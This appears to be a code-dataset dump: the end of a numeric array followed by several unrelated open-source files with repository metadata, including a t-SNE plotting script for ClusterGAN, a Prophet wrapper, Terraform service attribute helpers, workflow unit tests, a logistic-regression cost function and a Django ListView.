0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963,
0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963,
0.963, 0.963, 0.963, 0.963, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964,
0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.964, 0.963, 0.963,
0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.963, 0.962, 0.962,
0.962, 0.962, 0.962, 0.962, 0.962, 0.962, 0.961, 0.961, 0.961, 0.961,
0.961, 0.961, 0.960, 0.960, 0.960, 0.960, 0.960, 0.959, 0.959, 0.959,
0.959, 0.959, 0.958, 0.958, 0.958, 0.958, 0.957, 0.957, 0.957, 0.957,
0.956, 0.956, 0.956, 0.955, 0.955, 0.955, 0.955, 0.954, 0.954, 0.954,
0.953, 0.953, 0.953, 0.952, 0.952, 0.952, 0.951, 0.951, 0.951, 0.950,
0.950, 0.950, 0.949, 0.949, 0.949, 0.948, 0.948, 0.948, 0.947, 0.947,
0.947, 0.947, 0.946, 0.946, 0.946, 0.945, 0.945, 0.945, 0.944, 0.944,
0.944, 0.943, 0.943, 0.943, 0.943, 0.942, 0.942, 0.942, 0.941, 0.941,
0.941, 0.941, 0.940, 0.940, 0.940, 0.940, 0.939, 0.939, 0.939, 0.939,
0.939, 0.938, 0.938, 0.938, 0.938, 0.938, 0.937, 0.937, 0.937, 0.937,
0.937, 0.937, 0.936, 0.936, 0.936, 0.936, 0.936, 0.936, 0.936, 0.935,
0.935, 0.935, 0.935, 0.935, 0.935, 0.935, 0.935, 0.934, 0.934, 0.934,
0.934, 0.934, 0.934, 0.934, 0.934, 0.933, 0.933, 0.933, 0.933, 0.933,
0.933, 0.933, 0.933, 0.932, 0.932, 0.932, 0.932, 0.932, 0.932, 0.932,
0.932, 0.931, 0.931, 0.931, 0.931, 0.931, 0.931, 0.931, 0.930, 0.930,
0.930, 0.930, 0.930, 0.930, 0.929, 0.929, 0.929, 0.929, 0.929, 0.928,
0.928, 0.928, 0.928, 0.928, 0.928, 0.927, 0.927, 0.927, 0.927, 0.927,
0.926, 0.926, 0.926, 0.926, 0.925, 0.925, 0.925, 0.925, 0.925, 0.924,
0.924, 0.924, 0.924, 0.923, 0.923, 0.923, 0.923, 0.923, 0.922, 0.922,
0.922, 0.922, 0.921, 0.921, 0.921, 0.921, 0.921, 0.920, 0.920, 0.920,
0.920, 0.919, 0.919, 0.919, 0.919, 0.918, 0.918, 0.918, 0.918, 0.917,
0.917, 0.917, 0.917, 0.916, 0.916, 0.916, 0.916, 0.916, 0.915, 0.915,
0.915, 0.915, 0.914, 0.914, 0.914, 0.914, 0.913, 0.913, 0.913, 0.913,
0.912, 0.912, 0.912, 0.912, 0.912, 0.911, 0.911, 0.911, 0.911, 0.910,
0.910, 0.910, 0.910, 0.910, 0.909, 0.909, 0.909, 0.909, 0.909, 0.908,
0.908, 0.908, 0.908, 0.907, 0.907, 0.907, 0.907, 0.907, 0.906, 0.906,
0.906, 0.906, 0.906, 0.906, 0.905, 0.905, 0.905, 0.905, 0.905, 0.904,
0.904, 0.904, 0.904, 0.904, 0.904, 0.903, 0.903, 0.903, 0.903, 0.903,
0.902, 0.902, 0.902, 0.902, 0.902, 0.902, 0.902, 0.901, 0.901, 0.901,
0.901, 0.901, 0.901, 0.901, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900,
0.900, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.898,
0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.897, 0.897,
0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.896,
0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896,
0.896, 0.896, 0.896, 0.896, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895,
0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895,
0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895,
0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895, 0.895,
0.895, 0.895, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896,
0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.896, 0.897, 0.897,
0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.897, 0.898, 0.898,
0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.898, 0.899, 0.899,
0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.900,
0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900,
0.900, 0.900, 0.900, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901,
0.901, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901, 0.901,
0.901, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900, 0.900,
0.900, 0.900, 0.899, 0.899, 0.899, 0.899, 0.899, 0.899, 0.898, 0.898,
0.898, 0.898, 0.897, 0.897, 0.897, 0.897, 0.896, 0.896, 0.896, 0.895,
0.895, 0.895, 0.894, 0.894, 0.894, 0.893, 0.893, 0.892, 0.892, 0.891,
0.891, 0.890, 0.890, 0.889, 0.889, 0.888, 0.888, 0.887, 0.886, 0.886,
0.885, 0.884, 0.884, 0.883, 0.882, 0.881, 0.880, 0.880, 0.879, 0.878,
0.877, 0.876, 0.875, 0.874, 0.873, 0.872, 0.871, 0.870, 0.869, 0.868,
0.867, 0.866, 0.864, 0.863, 0.862, 0.861, 0.860, 0.858, 0.857, 0.856,
0.854, 0.853, 0.851, 0.850, 0.848, 0.847, 0.845, 0.844, 0.842, 0.841,
0.839, 0.837, 0.835, 0.834, 0.832, 0.830, 0.828, 0.827, 0.825, 0.823,
0.821, 0.819, 0.817, 0.815, 0.813, 0.811, 0.809, 0.806, 0.804, 0.802,
0.800, 0.798, 0.795, 0.793, 0.791, 0.788, 0.786, 0.784, 0.781, 0.779,
0.776, 0.774, 0.771, 0.768, 0.766, 0.763, 0.761, 0.758, 0.755, 0.752,
0.750, 0.747, 0.744, 0.741, 0.738, 0.735, 0.732, 0.729, 0.726, 0.723,
0.720, 0.717, 0.714, 0.711, 0.708, 0.705, 0.702, 0.698, 0.695, 0.692,
0.689, 0.685, 0.682, 0.679, 0.675, 0.672, 0.669, 0.665, 0.662, 0.658,
0.655, 0.651, 0.648, 0.644, 0.641, 0.637, 0.634, 0.630, 0.626, 0.623,
0.619, 0.616, 0.612, 0.608, 0.605, 0.601, 0.597, 0.593, 0.590, 0.586,
0.582, 0.579, 0.575, 0.571, 0.567, 0.564, 0.560, 0.556, 0.552, 0.548,
0.545, 0.541, 0.537, 0.533, 0.530, 0.526, 0.522, 0.518, 0.514, 0.511,
0.507, 0.503, 0.499, 0.496, 0.492, 0.488, 0.484, 0.480, 0.477, 0.473,
0.469, 0.466, 0.462, 0.458, 0.454, 0.451, 0.447, 0.443, 0.440, 0.436,
0.432, 0.429, 0.425, 0.422, 0.418, 0.414, 0.411, 0.407, 0.404, 0.400,
0.397, 0.393, 0.390, 0.386, 0.383, 0.379, 0.376, 0.373, 0.369, 0.366,
0.363, 0.359, 0.356, 0.353, 0.349, 0.346, 0.343, 0.340, 0.337, 0.333,
0.330, 0.327, 0.324, 0.321, 0.318, 0.315, 0.312, 0.309, 0.306, 0.303,
0.300, 0.297, 0.294, 0.291, 0.288, 0.286, 0.283, 0.280, 0.277, 0.274,
0.272, 0.269, 0.266, 0.264, 0.261, 0.258, 0.256, 0.253, 0.251, 0.248,
0.246, 0.243, 0.241, 0.238, 0.236, 0.233, 0.231, 0.229, 0.226, 0.224,
0.222, 0.219, 0.217, 0.215, 0.213, 0.211, 0.208, 0.206, 0.204, 0.202,
0.200, 0.198, 0.196, 0.194, 0.192, 0.190, 0.188, 0.186, 0.184, 0.182,
0.180, 0.178, 0.176, 0.174, 0.173, 0.171, 0.169, 0.167, 0.166, 0.164,
0.162, 0.160, 0.159, 0.157, 0.155, 0.154, 0.152, 0.151, 0.149, 0.147,
0.146, 0.144, 0.143, 0.141, 0.140, 0.138, 0.137, 0.135, 0.134, 0.133,
0.131, 0.130, 0.128, 0.127, 0.126, 0.124, 0.123, 0.122, 0.121, 0.119,
0.118, 0.117, 0.116, 0.114, 0.113, 0.112, 0.111, 0.110, 0.109, 0.107,
0.106, 0.105, 0.104, 0.103, 0.102, 0.101, 0.100, 0.099, 0.098, 0.097,
0.096, 0.095, 0.094, 0.093, 0.092, 0.091, 0.090, 0.089, 0.088, 0.087,
0.086, 0.085, 0.084, 0.084, 0.083, 0.082, 0.081, 0.080, 0.079, 0.078,
0.078, 0.077, 0.076, 0.075, 0.075, 0.074, 0.073, 0.072, 0.072, 0.071,
0.070, 0.069, 0.069, 0.068, 0.067, 0.067, 0.066, 0.065, 0.065, 0.064,
0.063, 0.063, 0.062, 0.061, 0.061, 0.060, 0.060, 0.059, 0.058, 0.058,
0.057, 0.057, 0.056, 0.055, 0.055, 0.054, 0.054, 0.053, 0.053, 0.052,
0.052, 0.051, 0.051, 0.050, 0.050, 0.049, 0.049, 0.048, 0.048, 0.047,
0.047, 0.046, 0.046, 0.045, 0.045, 0.045, 0.044, 0.044, 0.043, 0.043,
0.042, 0.042, 0.042, 0.041, 0.041, 0.040, 0.040, 0.040, 0.039, 0.039,
0.038, 0.038, 0.038, 0.037, 0.037, 0.037, 0.036, 0.036, 0.036, 0.035,
0.035, 0.035, 0.034, 0.034, 0.034, 0.033, 0.033, 0.033, 0.032, 0.032,
0.032, 0.031, 0.031, 0.031, 0.031, 0.030, 0.030, 0.030, 0.029, 0.029,
0.029, 0.029, 0.028, 0.028, 0.028, 0.027, 0.027, 0.027, 0.027, 0.026,
0.026, 0.026, 0.026, 0.026, 0.025, 0.025, 0.025, 0.025, 0.024, 0.024,
0.024, 0.024, 0.024, 0.023, 0.023, 0.023, 0.023, 0.022, 0.022, 0.022,
0.022, 0.022, 0.022, 0.021, 0.021, 0.021, 0.021, 0.021, 0.020, 0.020,
0.020, 0.020, 0.020, 0.019, 0.019, 0.019, 0.019, 0.019, 0.019, 0.019,
0.018, 0.018, 0.018, 0.018, 0.018, 0.018, 0.017, 0.017, 0.017, 0.017,
0.017, 0.017, 0.017, 0.016, 0.016, 0.016, 0.016, 0.016, 0.016, 0.016,
0.016, 0.015, 0.015, 0.015, 0.015, 0.015, 0.015, 0.015, 0.015, 0.014,
0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.014, 0.013, 0.013,
0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.013, 0.012, 0.012,
0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.012, 0.011, 0.011,
0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011, 0.011,
0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010, 0.010,
0.010, 0.010, 0.010, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009,
0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.009, 0.008, 0.008,
0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008, 0.008,
0.008, 0.008, 0.008, 0.008, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007, 0.007,
0.007, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006,
0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006, 0.006,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005, 0.005,
0.005, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004,
0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.004, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003,
0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.003, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002, 0.002,
0.002, 0.002, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000,
0.000]}
| 68.20354
| 7,828
| 0.613364
|
38e6aa47de618d25463d747676e024d7387f4e53
| 4,520
|
py
|
Python
|
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
tsne-cluster.py
|
eszabo12/clusterGAN
|
e91d1fe5c5a46512d55890902b51aab4ae8c98b1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
try:
import argparse
import os
import numpy as np
import sys
np.set_printoptions(threshold=sys.maxsize)
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import pandas as pd
from torch.autograd import Variable
from torch.autograd import grad as torch_grad
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets
import torchvision.transforms as transforms
from torchvision.utils import save_image
from itertools import chain as ichain
from clusgan.definitions import DATASETS_DIR, RUNS_DIR
from clusgan.models import Generator_CNN, Encoder_CNN, Discriminator_CNN
from clusgan.datasets import get_dataloader, dataset_list
from sklearn.manifold import TSNE
except ImportError as e:
print(e)
raise ImportError
def main():
global args
parser = argparse.ArgumentParser(description="TSNE generation script")
parser.add_argument("-r", "--run_dir", dest="run_dir", help="Training run directory")
parser.add_argument("-p", "--perplexity", dest="perplexity", default=-1, type=int, help="TSNE perplexity")
parser.add_argument("-n", "--n_samples", dest="n_samples", default=100, type=int, help="Number of samples")
args = parser.parse_args()
# TSNE setup
n_samples = args.n_samples
perplexity = args.perplexity
# Directory structure for this run
run_dir = args.run_dir.rstrip("/")
run_name = run_dir.split(os.sep)[-1]
dataset_name = run_dir.split(os.sep)[-2]
run_dir = os.path.join(RUNS_DIR, dataset_name, run_name)
data_dir = os.path.join(DATASETS_DIR, dataset_name)
imgs_dir = os.path.join(run_dir, 'images')
models_dir = os.path.join(run_dir, 'models')
# Latent space info
train_df = pd.read_csv('%s/training_details.csv'%(run_dir))
latent_dim = train_df['latent_dim'][0]
n_c = train_df['n_classes'][0]
cuda = True if torch.cuda.is_available() else False
# Load encoder model
encoder = Encoder_CNN(latent_dim, n_c)
enc_figname = os.path.join(models_dir, encoder.name + '.pth.tar')
encoder.load_state_dict(torch.load(enc_figname))
encoder.cuda()
encoder.eval()
# Configure data loader
dataloader = get_dataloader(dataset_name=dataset_name, data_dir=data_dir, batch_size=n_samples, train_set=False)
Tensor = torch.FloatTensor if cuda else torch.FloatTensor
# Load TSNE
if (perplexity < 0):
tsne = TSNE(n_components=2, verbose=1, init='pca', random_state=0)
fig_title = "PCA Initialization"
figname = os.path.join(run_dir, 'tsne-pca.png')
else:
tsne = TSNE(n_components=2, verbose=1, perplexity=perplexity, n_iter=300)
fig_title = "Perplexity = $%d$"%perplexity
figname = os.path.join(run_dir, 'tsne-plex%i.png'%perplexity)
# Get full batch for encoding
imgs, labels = next(iter(dataloader))
c_imgs = Variable(imgs.type(Tensor), requires_grad=False)
# Encode real images
enc_zn, enc_zc, enc_zc_logits = encoder(c_imgs)
# Stack latent space encoding
enc = np.hstack((enc_zn.cpu().detach().numpy(), enc_zc_logits.cpu().detach().numpy()))
#enc = np.hstack((enc_zn.cpu().detach().numpy(), enc_zc.cpu().detach().numpy()))
# Cluster with TSNE
tsne_enc = tsne.fit_transform(enc)
# Convert to numpy for indexing purposes
labels = labels.cpu().data.numpy()
# Color and marker for each true class
colors = cm.rainbow(np.linspace(0, 1, n_c))
markers = matplotlib.markers.MarkerStyle.filled_markers
# Save TSNE figure to file
fig, ax = plt.subplots(figsize=(16,10))
for iclass in range(0, n_c):
# Get indices for each class
idxs = labels==iclass
# Scatter those points in tsne dims
ax.scatter(tsne_enc[idxs, 0],
tsne_enc[idxs, 1],
marker=markers[iclass],
c=colors[iclass],
edgecolor=None,
label=r'$%i$'%iclass)
ax.set_title(r'%s'%fig_title, fontsize=24)
ax.set_xlabel(r'$X^{\mathrm{tSNE}}_1$', fontsize=18)
ax.set_ylabel(r'$X^{\mathrm{tSNE}}_2$', fontsize=18)
plt.legend(title=r'Class', loc='best', numpoints=1, fontsize=16)
plt.tight_layout()
fig.savefig(figname)
if __name__ == "__main__":
main()
| 33.731343
| 116
| 0.67146
|
d7a7d0cc208fba6cc0acdc238e1b2db91abb7b42
| 658
|
py
|
Python
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 3,301
|
2018-10-01T16:30:44.000Z
|
2022-03-30T08:07:16.000Z
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 206
|
2019-11-27T14:04:42.000Z
|
2022-03-28T08:02:05.000Z
|
core/src/main/python/python_runner/algo/prophet/impl.py
|
zhangjun0x01/Alink
|
c1cd3380bed29a4be4eb058a7462213869c02387
|
[
"Apache-2.0"
] | 765
|
2018-10-09T02:02:19.000Z
|
2022-03-31T12:06:21.000Z
|
import pandas as pd
from prophet import Prophet
from prophet.serialize import model_to_json
class PyProphetCalc:
def setCollector(self, collector):
self._collector = collector
def calc(self, arg):
ds_array = []
y_array = []
for row in arg:
ds_array.append(row[0])
y_array.append(row[1])
list_of_tuples = list(zip(ds_array, y_array))
df = pd.DataFrame(list_of_tuples, columns=['ds', 'y'])
m = Prophet()
m.fit(df)
self._collector.collectRow(model_to_json(m))
class Java:
implements = ["com.alibaba.alink.common.pyrunner.PyMIMOCalcHandle"]
| 26.32
| 75
| 0.62614
|
1803bc72674f2a9f648af9141f1ff78837b4b8fe
| 1,387
|
py
|
Python
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 4
|
2021-11-26T05:41:05.000Z
|
2022-03-11T20:01:40.000Z
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 10
|
2021-07-14T05:19:54.000Z
|
2021-11-02T05:37:48.000Z
|
shells/generic_terraform_service/tests/integration_tests/helper_services/service_attributes_factory.py
|
oleksandr-r-q/CloudShell-Terraform-Shell
|
8d331cf8eebeae794e4e73a3c70af8064bafa434
|
[
"Apache-2.0"
] | 1
|
2021-11-01T07:46:59.000Z
|
2021-11-01T07:46:59.000Z
|
from cloudshell.api.cloudshell_api import NameValuePair
from tests.integration_tests.constants import SHELL_NAME, ATTRIBUTE_NAMES
class ServiceAttributesFactory:
@staticmethod
def create_empty_attributes() -> list[dict]:
attributes = [
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.REMOTE_STATE_PROVIDER}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.BRANCH}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.CUSTOM_TAGS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.APPLY_TAGS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.GITHUB_TERRAFORM_MODULE_URL}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TERRAFORM_VERSION}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.GITHUB_TOKEN}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.CLOUD_PROVIDER}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.UUID}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_OUTPUTS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_SENSIITVE_OUTPUTS}", Value=""),
NameValuePair(Name=f"{SHELL_NAME}.{ATTRIBUTE_NAMES.TF_INPUTS}", Value="")
]
return attributes
| 57.791667
| 104
| 0.687815
|
d21696b5a1d5b049e2a2165e902d9c669ed430b2
| 2,034
|
py
|
Python
|
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/native/test_workflow_error_handling.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import states
from orquesta.tests.unit.conducting.native import base
class WorkflowErrorHandlingConductorTest(base.OrchestraWorkflowConductorTest):
def test_error_log_fail(self):
wf_name = 'error-log-fail'
expected_task_seq = [
'task1',
'log',
'fail'
]
mock_states = [
states.FAILED, # task1
states.SUCCEEDED # log
]
mock_results = [
'All your base are belong to us!', # task1
'All your base are belong to us!' # log
]
self.assert_spec_inspection(wf_name)
self.assert_conducting_sequences(
wf_name,
expected_task_seq,
mock_states=mock_states,
mock_results=mock_results,
expected_workflow_state=states.FAILED
)
def test_error_concurrent_log_fail(self):
wf_name = 'error-log-fail-concurrent'
expected_task_seq = [
'task1',
'fail'
]
mock_states = [
states.FAILED # task1
]
mock_results = [
'All your base are belong to us!' # task1
]
self.assert_spec_inspection(wf_name)
self.assert_conducting_sequences(
wf_name,
expected_task_seq,
mock_states=mock_states,
mock_results=mock_results,
expected_workflow_state=states.FAILED
)
| 27.863014
| 78
| 0.613078
|
06b5a158be61fb81917af52864f225e1f64dfb05
| 421
|
py
|
Python
|
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | 1
|
2021-06-02T15:27:58.000Z
|
2021-06-02T15:27:58.000Z
|
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | null | null | null |
notebooks/Ex3-Neural-Networks/ex3-py/lrCostFunction.py
|
jesussantana/Machine-Learning-Stanford-University
|
7ee8527d8a2df43c674757e060d1c7ccad2926a4
|
[
"MIT"
] | null | null | null |
import numpy as np
from sigmoid import sigmoid
def lrCostFunction(theta, X, y, lamda):
theta = theta.reshape((theta.size, 1))
m = y.size
h = sigmoid(X.dot(theta))
J = np.mean(-y * np.log(h) - (1 - y) * np.log(1 - h))
J += np.square(theta[1:]).sum() * lamda / 2 / m
grad = X.T.dot(h - y) / m
grad[1:] = grad[1:] + lamda * theta[1:] / m
return J, grad.ravel()
| 21.05
| 58
| 0.513064
|
7f5d0758ce5e2e3109c2a53edfd6feaa0316cec0
| 154
|
py
|
Python
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 492
|
2019-06-25T12:54:31.000Z
|
2022-03-30T12:38:28.000Z
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 23
|
2019-10-01T01:36:08.000Z
|
2022-02-10T12:46:16.000Z
|
2019/08/03/The Basics of Django ListView/listviewexample/listviewexample/example/views.py
|
kenjitagawa/youtube_video_code
|
ef3c48b9e136b3745d10395d94be64cb0a1f1c97
|
[
"Unlicense"
] | 1,734
|
2019-06-03T06:25:13.000Z
|
2022-03-31T23:57:53.000Z
|
from django.shortcuts import render
from django.views.generic import ListView
from .models import Member
class MemberList(ListView):
model = Member
| 19.25
| 41
| 0.798701
|
b82b4bc841a56c1d63cf16cc78312f6e64430412
| 3,639
|
py
|
Python
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 8
|
2020-09-16T17:22:13.000Z
|
2022-02-01T00:11:30.000Z
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 216
|
2020-09-20T13:05:58.000Z
|
2022-03-28T12:10:24.000Z
|
tests/engine/training/test_hooks.py
|
praneethgb/rasa
|
5bf227f165d0b041a367d2c0bbf712ebb6a54792
|
[
"Apache-2.0"
] | 1
|
